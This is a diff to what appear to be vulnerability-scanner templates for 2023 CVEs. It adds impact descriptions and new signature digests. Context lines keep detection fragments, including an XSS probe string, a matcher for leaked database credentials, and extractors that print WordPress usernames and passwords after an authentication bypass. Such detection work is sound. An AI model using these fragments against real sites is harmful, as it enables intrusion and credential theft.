+# digest: 4a0a004730450220488a6bed9ccec93397654bd0bd634d3b0a050ae9d10d089a48e8eb7d5ce9e734022100ed5669e8fd0531baf30f1028739506470fa46a0956fc700eb753b4b3751e8803:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml
index 00f28a9f84..1cac952fe4 100644
--- a/http/cves/2023/CVE-2023-27179.yaml
+++ b/http/cves/2023/CVE-2023-27179.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.
+  impact: |
+    An attacker can exploit this vulnerability to download arbitrary files from the server.
   remediation: |
     Apply the latest patch or upgrade to a newer version of GDidees CMS.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 480a00453043022020ec04f4823175a3c46e19fdf5c7f3c64b1cc9ca63dbebea30d611328f200a69021f500f76f063c1bcd174e1d151797139c734f78e390882bda453b59d5883b813:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202b5fa48254aa4449e0dd2a068e23b74adf62f478db5edfad0d80faba7d817e3f022058bbbd39a23f4a6ece6f75433077fbe66ac0518903295cdb8142b97329c75834:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml
index 34a8c2ba78..fb91d05ea2 100644
--- a/http/cves/2023/CVE-2023-27292.yaml
+++ b/http/cves/2023/CVE-2023-27292.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.
+  impact: |
+    An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest patch or update to the latest version of OpenCATS to fix the open redirect vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022037609edb1ce43f53b205fd6e94b3b0bf66c75a9cd5cc243c36b2d504673d438a02201787eef9845f4262df95b841bc9d9dd384dc56356b42ad45ee2227db4ed9d896:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204e20b8bd593d43a1f745424821925edf686c80afdd509a006a0eef127cfe8b9a022037e7c8bb46973564b7734cc43450a593d4679262d4718337e5ab054bce51b5e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml
index f45c845898..371c6d0a1b 100644
--- a/http/cves/2023/CVE-2023-2732.yaml
+++ b/http/cves/2023/CVE-2023-2732.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the MStore API, potentially leading to data breaches or unauthorized actions.
   remediation: |
     Upgrade to a patched version of MStore API (version 3.9.3 or above) to mitigate the authentication bypass vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022018f275bb4b9ed48e64f96c6c9c2cff55e90ac51ab3847d165e7be4b0b1ff14e7022100b8196e1496b447398d7962f3d96f073a09730b809f114071aca226fe677feaff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204ecc059fc6dd5984044de016064f1ed9a04363645584535b5255fc996d67916d02210082b59a9fe2a5cf2c509ae359be9f5f26ce54d9f2eef7f5a6771fd9912ffcafae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml
index 9716a77b35..e6f76df290 100644
--- a/http/cves/2023/CVE-2023-27350.yaml
+++ b/http/cves/2023/CVE-2023-27350.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -124,4 +126,4 @@ http:
           - 'erList\/selectPrinterCost&amp;sp=([a-z0-9]+)">'
         internal: true
         part: body
-# digest: 4a0a00473045022000e31de1aeba81cfc5fe875aa4cb45f274a3bede9117d82ffe617bbbd2b48a57022100f9fd7c5796d27fe352dd5dec7331a2a4dea391e9ccc24b2a08f1e1bb42150b48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220249412b685fdb1b2d5c21e58ae970cdbc8cf09fca61d89de399f5cacfb009d0c022066a56f5e895e6fd60b0b8e5572f0b01ff8ce99dcb973d7b6c81272339f4426e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml
index 8f7c6ecd8c..525fe32cf9 100644
--- a/http/cves/2023/CVE-2023-27372.yaml
+++ b/http/cves/2023/CVE-2023-27372.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of SPIP.
   reference:
@@ -69,4 +71,4 @@ http:
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
         part: body_2
-# digest: 490a0046304402204bb81d32ea114cb6dfce505743fb87235a6d8f3776c3ce8c20c5c46e58e4db03022053e720f611615813bfadfef18e511fd77f2543956456396e6a5c55fc02f287c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205e01b1bfd82b4b3596f5db12b58898023d9f9860825259a7780a9f40de68d9f502210080d7ddfcfae77417b0063ac2864184334a8fdcc1be8f64ef2beddfbaddf9dfc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml
index db7c71b587..e2e13a79a9 100644
--- a/http/cves/2023/CVE-2023-27482.yaml
+++ b/http/cves/2023/CVE-2023-27482.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the Home Assistant Supervisor, potentially leading to further compromise of the system.
   remediation: |
     The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220755a8ac16001b5e68b560b9070b4c97de4b6c1d43a0eb75c6de104cf18076700022046bdfc7f515eda60f5ea00c32a8e2f25af82ef0ae41f4f479b263c5b92a33d26:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203b767972a16b2c45f68fc433af6f595278e60a42244000102e05db634b2b3ea902205128ac8bc22fb1d1adc9eb231dc161064c44993f48dcfa57a49fe46b1a20c834:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml
index d43e2209f3..664b22a8ba 100644
--- a/http/cves/2023/CVE-2023-27524.yaml
+++ b/http/cves/2023/CVE-2023-27524.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDK,_0xf4n9x_
   severity: critical
   description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Apache Superset.
   reference:
@@ -69,4 +71,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210089e901be6d58c46eb47e4ccc239d89d8c8f4bd09df0edb9b492ff05cd4f45daf02207b9f7ddc256cc16c4c585687176fc1d6d1a493bf8f51158c3d9fceefb490b8f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022033a3491dba176860f61e53de135ed4719b81bf9e1200a42b3e6dbbe9596450d302206650d6d3a7182d4dfc9d60b822909a3a4ce79739bb0933a86c9848c865801724:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml
index 43c84c8154..1f689d32f6 100644
--- a/http/cves/2023/CVE-2023-27587.yaml
+++ b/http/cves/2023/CVE-2023-27587.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.
+  impact: |
+    This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details.
   remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4b0a00483046022100c5379d51e96475a79a817ab014ec36467c3f4842a5cefd766d63de70915567a8022100de7aae5ebff18f68f284ce08b7e6efff5f7ab4576b52759c357b1ab63a437b17:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a5822f3d4f9e9a48f60a6c4abccccbc3cdbd6ed6fb0743715fc35586f4b7e07a022100c055429b407405c710151edc16775994da8a26e01cec0ae85dd363542c40faa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml
index 9cb66f5128..819c25bbbd 100644
--- a/http/cves/2023/CVE-2023-2766.yaml
+++ b/http/cves/2023/CVE-2023-2766.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
   reference:
     - https://github.com/8079048q/cve/blob/main/weaveroa.md
     - https://nvd.nist.gov/vuln/detail/CVE-2023-2766
@@ -39,4 +41,4 @@ http:
           - 'contains(header,"text/plain")'
           - 'contains_all(body, "sdbuser =","sdbpassword =")'
         condition: and
-# digest: 490a0046304402204107953f99abb316d1eba6a6a32c9cf8c27b3d1e55cdd0754d131368ba479f3802202952f1b4177d56a461ffe7aa18c29a3781ce559abf8c74a25fdc166b18dcddd2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e44ff0c2b91b64d09c19fc0180cc61e7986c44c75936b6b142b8f06e61ee3ca702200b81cd28c09713085a15e5925346ba9416efc7e4b4969a23c77bdae54dd31413:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml
index 961133f07f..c11a1248f2 100644
--- a/http/cves/2023/CVE-2023-2780.yaml
+++ b/http/cves/2023/CVE-2023-2780.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.
+  impact: |
+    Successful exploitation could allow an attacker to read sensitive files on the server.
   remediation: |
     Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
           - '"version": "([0-9.]+)",'
         internal: true
         part: body
-# digest: 4b0a00483046022100f675d7aaadf8b244b868474329f9250902d46b7d4ade4a221306fd1b01cab10a0221008eb5572a66046b026b468b5f831f18785b1f4dbb39140cc346dba97e3b2fb621:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c0a0a7235e45545c6949b093ff2e4feb3b5420bf970473ea1eb721bd1d1d8a2f022100b3ed31e5657c7ec5758e0fffc5cb6e473b3f2c5afcd033f90c427fad158fad00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml
index 51ead5c603..dbd2865cf5 100644
--- a/http/cves/2023/CVE-2023-2796.yaml
+++ b/http/cves/2023/CVE-2023-2796.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
+  impact: |
+    Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events.
   remediation: Fixed in version 2.1.2
   reference:
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a39daedc8a6fea1fb8dccbfdae37ca3a5dd4d86ca6c161d65e5b91596aaf1d5402203624e6e489d45d29b8e56f2f8c6f045e76c5e81c1485d8b5d1523685e7ac6c6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205a16ef21f72eea2cb4fd0a2e1a6000a2e19eb9a9191ca719e02e36cee4ddebab02202c6a201353e67af1f30e40309ee18e4e478c95571e58cd50750caded54fb7e67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml
index bee6d77f3e..6b9c9dd5fd 100644
--- a/http/cves/2023/CVE-2023-28121.yaml
+++ b/http/cves/2023/CVE-2023-28121.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.
+  impact: |
+    An attacker can gain unauthorized access to the WooCommerce Payments admin panel, potentially leading to data theft or modification.
   remediation: |
     Update to the latest version of the WooCommerce Payments plugin to fix the vulnerability.
   reference:
@@ -70,4 +72,4 @@ http:
         dsl:
           - '"WP_USERNAME: "+ username'
           - '"WP_PASSWORD: "+ password'
-# digest: 4b0a00483046022100f9ff1f50fdef05ceffd9c9a46780c01c19464cde48b212064cb1eab4991bca8c022100b634f17bfd4b2bceb5218665518e61d5c64e7c62202aaf08bb8d50d4a9b915e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a0974ddeb2094e0504518b588bb0aca2c5a282899991354cf82198412fc8252f022100d7c4e04c8251d4ab172f54a7befe50b376e6632e9396044977c9150b84d78909:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml
index d74b03b2ed..dfe67b8556 100644
--- a/http/cves/2023/CVE-2023-2813.yaml
+++ b/http/cves/2023/CVE-2023-2813.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   reference:
     - https://wpscan.com/vulnerability/f434afd3-7de4-4bf4-a9bb-9f9aeaae1dc5
     - https://nvd.nist.gov/vuln/detail/CVE-2023-2813
@@ -24,6 +26,7 @@ info:
     product: connections_reloaded
     framework: wordpress
   tags: wpscan,cve,cve2023,wordpress,wp-theme,xss,ajaydsouza
+
 variables:
   str: "{{rand_base(6)}}"
   random: "{{rand_base(3)}}"
@@ -44,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203f34dfc497085379e4227e6352b6e8bc48ac47efbcda4249e1326bf69a1f21dc022100f94ee986ff993013fdddddb384244ab6134eaf95f0fbab4559efaf0c732cac2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022026c24bdbed826f378de6a44ab7f39c267e9cffdb502aef8b7cdb063b01ddfc7d022100e344d8e2a2c3e9a9d304a0c34be5a71f207f5c30af64c3ef32c8eda36def064c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml
index 1aec8a6950..ac815747ce 100644
--- a/http/cves/2023/CVE-2023-2822.yaml
+++ b/http/cves/2023/CVE-2023-2822.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component.
   reference:
     - https://medium.com/@cyberninja717/685bb1675dfb
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008fb1c8df61a2883de55d29b6f6c34ec7ca42689cc3cba315143fccc6c83d57f102201a31b78b4e8e97c58bd0cb9a795f781cb506b6c6e8ce3d0f8cede32891e7f215:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203d9093029ba5cc8248749782eed5ce3c481d5cf9dc3d6072672552b066cc1b9202207abb6d81424c0d6bfe3b8dba1bf3460641841b6d09c15e97d9de49d010752d9f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml
index 01b3b90ed2..ae4e000096 100644
--- a/http/cves/2023/CVE-2023-28343.yaml
+++ b/http/cves/2023/CVE-2023-28343.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bce0a518611d03cdd93a74de6acc400a31ad0b9383352835886c620d2725c60802202db38e23d3f1f8bf6c41a55124010c9590e8503e671cc7de6e6437ebb8e16d11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c3b86b1205f36d490503466cf200b4da6a0939f1166f5a3e8c64e9484cf402cf0221009fee3eb6ff71becf350bc02c9a67dee44f0c22715137386d559056ed0cfedfdf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml
index c5d07962b9..92f830169f 100644
--- a/http/cves/2023/CVE-2023-28432.yaml
+++ b/http/cves/2023/CVE-2023-28432.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
+  impact: |
+    An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster.
   remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
   reference:
     - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200f5d797afaed451dcd66b10eb52e63f071f03b7e9748981aebe222b675026f02022100baafbbb9eabdff0f90539d8be7c1f82ba71e3f8fc7e8ff0bf7dcc929481c3d2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022015f059507358692019d290ca41ad70c2776ef65803e6d4b21331581d4a8430e6022100c0bb3c7aa6a6b7378d9ab96ff854f6fd00716ed28320173e3ebb80dc2738ce97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml
index 8123a8a746..44fcd4d80b 100644
--- a/http/cves/2023/CVE-2023-28665.yaml
+++ b/http/cves/2023/CVE-2023-28665.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 2.2.2
   reference:
     - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036
@@ -46,4 +48,4 @@ http:
           - 'contains(body_2, "<svg onload=alert(document.domain)>")'
           - 'contains(body_2, "pagination\":")'
         condition: and
-# digest: 4b0a00483046022100bd4507751fc6aa9e915419e365527d272f2642acc05eb765d58636b21a1a94bd0221008f73fa88ca0f7fa1c0584bccb2752abedca9aad77dc1b4cc1b235fb7d4f883ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201ed0ac2d320b8e177fd5c9d522dba77007d5a03672754fc2de70445f793f4d04022100b4ba68add9252161f4ff37c6a7a44ff015ade440c007b05f7b6c6f252b0bda82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml
index c463f4c65a..0230aa6c14 100644
--- a/http/cves/2023/CVE-2023-29084.yaml
+++ b/http/cves/2023/CVE-2023-29084.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system.
   remediation: |
     Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
   reference:
@@ -77,4 +79,4 @@ http:
         kval:
           - admpcsrf
         part: header
-# digest: 4b0a00483046022100f79ad0d1ea1527311bd9b42ad235ca7f9eb063ec0b8c69d99d30d9d613e92df5022100e0f822ea03bf6a6085fd675755916776c37847313fcbadee21fb5d482006c0e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205bdeae287abf89bcbf470cbd290a4e8e19a483abbf411809294c6b7d56f0d9ab022100a27196c52735daf188b4e17d6b724b8bbdb14ab19f8ef24823cc596ba6fbe486:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml
index dcae2e590e..05e442f079 100644
--- a/http/cves/2023/CVE-2023-29298.yaml
+++ b/http/cves/2023/CVE-2023-29298.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: |
     Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - status_code == 200
           - len(trim_space(body)) == 106
         condition: and
-# digest: 4b0a00483046022100911c7e9a9a5d4622671b8c21d57abf8d4c142f6ed5eac4897598b7782ef750ae022100e247c88439306294622a3f5d4eb122ca93de748a5dac2055872643cc1b13c2ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008f0c3338ba3ae13f98d7b34bca872522ff4bcab8f172db22b5c7e7e7e4d5c9a202203a82286a4fb145a9d6462be3229f3bab4374602f5788df0f94dae70fbe565e70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml
index ae5f9e8edc..8cdf09b247 100644
--- a/http/cves/2023/CVE-2023-29300.yaml
+++ b/http/cves/2023/CVE-2023-29300.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to Adobe ColdFusion version 2023.0.0.328155 or later to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - contains(interactsh_protocol, "dns")
           - contains(body, "ColdFusion documentation")
         condition: and
-# digest: 4a0a004730450220030c5b401ac9a14e10dd06807fcf9849a061c9dd3c02c9ae44210fa83d936b8d022100842b4a3df9a97dbfcf869ee805e8e1d703360ff91350393eb0cb608979694f48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207b5fe520fc2612425dcd582da24f25f1ade569d57beb362db706a7cdcc6fdb1b022100ecc6e07a5dfe8eab100e084c52e88c83b9868338b65ce17c9a24a1ae4c55bb15:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml
index 89631218b0..02d3ea61f9 100644
--- a/http/cves/2023/CVE-2023-29489.yaml
+++ b/http/cves/2023/CVE-2023-29489.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
+  impact: |
